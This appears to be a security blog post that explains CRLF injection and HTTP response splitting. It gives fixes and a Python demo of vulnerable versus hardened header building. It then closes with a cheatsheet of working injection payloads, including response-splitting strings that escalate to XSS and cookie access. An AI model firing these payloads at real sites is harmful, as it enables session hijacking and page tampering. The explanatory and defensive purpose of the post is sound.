CRLF Injection Defined

CRLF stands for CR (Carriage Return) and LF (Line Feed).

CRLF Injection is one of the types of web injection attacks, carried out by exploiting a CRLF injection flaw in an HTTP response.

CR and LF are used to mark the end of a line, but they are handled differently by today's popular operating systems.

For example:

In Windows both a CR and an LF are required to mark the end of a line, whereas in Linux/UNIX only an LF is required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line (a header line, and the blank line that separates headers from the body).

Attackers can modify the application's response data, compromising its integrity and enabling the exploitation of other vulnerabilities such as Cross Site Scripting (XSS), web page injection, web server cache poisoning, website defacement and more.

A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.


How To Fix?

  • You should always use a function to encode the CR and LF special characters.
  • Strip any newline characters before passing content into the HTTP header.
  • Encode the data that you pass into HTTP headers. This will effectively scramble the CR and LF codes if the attacker attempts to inject them.
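As an added example (not from the original post), the vulnerable concatenation beside the hardened forms the fix list describes. The `next` parameter value, the minimal response builder and the lenient header parser are constructed for the demonstration; real servers and frameworks differ in how they treat a bare CR or LF.

```python
from __future__ import annotations
import re
from urllib.parse import unquote

# Constructed sample: a redirect target parameter carrying a cheatsheet-style
# "%0d%0aSet-Cookie:" payload, shown after URL decoding as the app would see it.
MALICIOUS_NEXT = unquote("/home%0d%0aSet-Cookie:csrf_token=attackervalue")
BENIGN_NEXT = "/home"

_CTL = re.compile(r"[\r\n\x00]")


def sanitize_header_value(value: str) -> str:
    """Fix option 1: strip CR, LF and NUL before the value reaches a header."""
    return _CTL.sub("", value)


def encode_header_value(value: str) -> str:
    """Fix option 2: percent-encode CR/LF so a client sees one header line only."""
    return value.replace("\r", "%0D").replace("\n", "%0A")


def build_redirect_unsafe(location: str) -> bytes:
    """Vulnerable: untrusted value concatenated straight into the Location line."""
    return f"HTTP/1.1 302 Found\r\nLocation: {location}\r\n\r\n".encode()


def build_redirect_safe(location: str) -> bytes:
    """Hardened: the same response with the value encoded first."""
    return f"HTTP/1.1 302 Found\r\nLocation: {encode_header_value(location)}\r\n\r\n".encode()


def parse_headers(raw: bytes) -> list[tuple[str, str]]:
    """Split a raw response head like a lenient client: any of CRLF, CR or LF ends a line."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode()
    lines = re.split(r"\r\n|\r|\n", head)[1:]  # drop the status line
    headers = []
    for line in lines:
        name, _, val = line.partition(":")
        headers.append((name.strip().lower(), val.strip()))
    return headers


def injected_headers(raw: bytes) -> list[str]:
    """Names of any header other than the single Location the server intended."""
    return [name for name, _ in parse_headers(raw) if name != "location"]
```

With the unsafe builder the malicious value yields an extra `set-cookie` header; with the encoded value the whole payload stays inside the Location line. Note that Python's own `http.client` and `http.server` already reject CR/LF in header values, which is why the example builds raw bytes.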

CRLF Injection Cheatsheet

CRLF Injection || HTTP Response Splitting

%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;


Header-based test, site root

%0d%0aheader:header
%0aheader:header
%0dheader:header
%23%0dheader:header
%3f%0dheader:header
/%250aheader:header
/%25250aheader:header
/%%0a0aheader:header
/%3f%0dheader:header
/%23%0dheader:header
/%25%30aheader:header
/%25%30%61header:header
/%u000aheader:header


CRLF chained with Open Redirect server misconfiguration

Note: This sometimes works. (Discovered in some Yandex sites, was not exploitable from the root.)

//www.google.com/%2f%2e%2e%0d%0aheader:header
/www.google.com/%2e%2e%2f%0d%0aheader:header
/google.com/%2F..%0d%0aheader:header


CRLF Injection to XSS

%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e


Response splitting on 302 Redirect, before Location header (Discovered in DoD)

%0d%0aContent-Type:%20text%2fhtml%0d%0aHTTP%2f1.1%20200%20OK%0d%0aContent-Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert('XSS');%3C%2fscript%3E


Response splitting on a 301 code, chained with an Open Redirect to corrupt the Location header and break the 301, by @black2fan (Facebook bug)

Note: xxx:1 was used to break the open redirect destination (Location header). A great example of how to escalate CRLF to XSS on what would seem to be an unexploitable 301 status code.

%2Fxxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%0a%3cscript%3ealert(document.cookie)%3c/


Source: OWASP, GitHub

More from Priyanshu Sahay
